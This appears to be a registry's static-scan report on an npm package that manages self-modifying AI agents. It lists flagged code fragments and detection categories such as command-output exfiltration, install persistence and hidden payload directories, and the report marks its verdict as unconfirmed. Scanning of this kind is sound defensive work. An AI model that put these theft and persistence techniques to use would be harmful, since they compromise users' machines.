registry  /  volute  /  0.43.0

volute@0.43.0

⚠ Under review

CLI for creating and managing self-modifying AI minds powered by the Claude Agent SDK

Static Scan Results

scanned 2d ago · by rust-scanner

Static analysis flagged 19 finding(s) at 93.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
One or more suspicious static signals were detected.; previous stored version diff introduced dangerous source

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessCryptoDynamicRequireEnvironmentVarsFilesystemNetworkShellWebSocket
Supply chain
HighEntropyStringsMinifiedObfuscatedUrlStrings
ManifestNo manifest risk signals triggered.
scanned 181 file(s), 1.98 MB of source, external domains: 127.0.0.1, api.anthropic.com, api.telegram.org, discord.com, github.com, openrouter.ai, registry.npmjs.org, slack.com, svelte.dev, volute.systems, www.apple.com, www.w3.org

Source & flagged code

10 flagged · loading source
dist/chunk-C6ESRQZ7.jsView file
9// [redacted].ts L10: import { execFileSync } from "child_process"; L11: var slog = logger_default.child("sandbox");
High
Child Process

Package source references child process execution.

dist/chunk-C6ESRQZ7.jsView on unpkg · L9
dist/service-4EVZKGSA.jsView file
116}); L117: var run = cmd.execute; L118: export {
High
Shell

Package source references shell execution.

dist/service-4EVZKGSA.jsView on unpkg · L116
dist/chunk-PF2AB7VJ.jsView file
matchType = previous_version_dangerous_delta matchedPackage = volute@0.40.2 matchedIdentity = npm:dm9sdXRl:0.40.2 similarity = 0.775 summary = stored previous version shares package body but lacks this dangerous source file
Critical
Previous Version Dangerous Delta

This package version adds a dangerous source file absent from the previous stored version; route for source-aware review.

dist/chunk-PF2AB7VJ.jsView on unpkg
907try { L908: const { getSleepManagerIfReady: getSleepManagerIfReady2 } = await import("./sleep-manager-BVU5D2AE.js"); L909: const sleepMgr = getSleepManagerIfReady2();
Medium
Dynamic Require

Package source references dynamic require/import behavior.

dist/chunk-PF2AB7VJ.jsView on unpkg · L907
dist/chunk-EE7SZJON.jsView file
11// [redacted]-install.ts L12: import { execFile } from "child_process"; L13: import { mkdirSync, writeFileSync } from "fs"; ... L37: if (opts?.host) args.push("--host", opts.host); L38: const logPath = resolve(homedir(), ".volute", "system", "daemon.log"); L39: return `<?xml version="1.0" encoding="UTF-8"?> ... L84: const voluteBin = resolveVoluteBin(); L85: const platform = process.platform; L86: if (platform === "darwin") { ... L90: try { L91: await execFileAsync("launchctl", ["bootout", `${uid}/${LAUNCHD_PLIST_LABEL}`]); L92: } catch {
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

dist/chunk-EE7SZJON.jsView on unpkg · L11
dist/daemon.jsView file
471); L472: const daemonToken = process.env.VOLUTE_DAEMON_TOKEN; L473: if (!daemonToken) { ... L480: ...process.env, L481: VOLUTE_DAEMON_URL: `http://${daemonLoopback()}:${daemonPort}`, L482: VOLUTE_DAEMON_TOKEN: daemonToken, ... L486: }; L487: const child = spawn(process.execPath, [builtinBridge], spawnOpts); L488: let lastStderr = "";
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

dist/daemon.jsView on unpkg · L471
480...process.env, L481: VOLUTE_DAEMON_URL: `http://${daemonLoopback()}:${daemonPort}`, L482: VOLUTE_DAEMON_TOKEN: daemonToken, ... L486: }; L487: const child = spawn(process.execPath, [builtinBridge], spawnOpts); L488: let lastStderr = ""; L489: child.stdout?.pipe(logStream); L490: child.stderr?.on("data", (chunk) => { L491: logStream.write(chunk); L492: lastStderr = chunk.toString().trim();
High
Command Output Exfiltration

Source combines command execution, command-output handling, and outbound requests; review data flow before blocking.

dist/daemon.jsView on unpkg · L480
7128const [cmd, args] = await wrapForIsolation("npm", ["install"], mindName); L7129: await exec(cmd, args, { L7130: cwd: variantDir, ... L7137: const msg = e instanceof Error ? e.message : String(e); L7138: return c.json({ error: `npm install failed: ${msg}` }, 500); L7139: }
High
Runtime Package Install

Package source invokes a package manager install command at runtime.

dist/daemon.jsView on unpkg · L7128
dist/skills/dreaming/scripts/wake-context-dreams.shView file
path = [redacted]-context-dreams.sh kind = build_helper sizeBytes = 1180 magicHex = [redacted]
Medium
Ships Build Helper

Package ships non-JavaScript build or shell helper files.

dist/skills/dreaming/scripts/wake-context-dreams.shView on unpkg
templates/_base/.init/.local/hooks/wake-context.shView file
path = templates/_base/.init/.local/hooks/wake-context.sh kind = payload_in_excluded_dir sizeBytes = 421 magicHex = [redacted]
High
Payload In Excluded Dir

Package hides binary, compressed, or executable-looking payloads in test/fixture/hidden paths.

templates/_base/.init/.local/hooks/wake-context.shView on unpkg

Findings

1 Critical6 High6 Medium6 Low
CriticalPrevious Version Dangerous Deltadist/chunk-PF2AB7VJ.js
HighChild Processdist/chunk-C6ESRQZ7.js
HighShelldist/service-4EVZKGSA.js
HighSame File Env Network Executiondist/daemon.js
HighCommand Output Exfiltrationdist/daemon.js
HighRuntime Package Installdist/daemon.js
HighPayload In Excluded Dirtemplates/_base/.init/.local/hooks/wake-context.sh
MediumDynamic Requiredist/chunk-PF2AB7VJ.js
MediumNetwork
MediumEnvironment Vars
MediumInstall Persistencedist/chunk-EE7SZJON.js
MediumShips Build Helperdist/skills/dreaming/scripts/wake-context-dreams.sh
MediumStructural Risk Force Deep Review
LowNon Install Lifecycle Scripts
LowScripts Present
LowFilesystem
LowObfuscated
LowHigh Entropy Strings
LowUrl Strings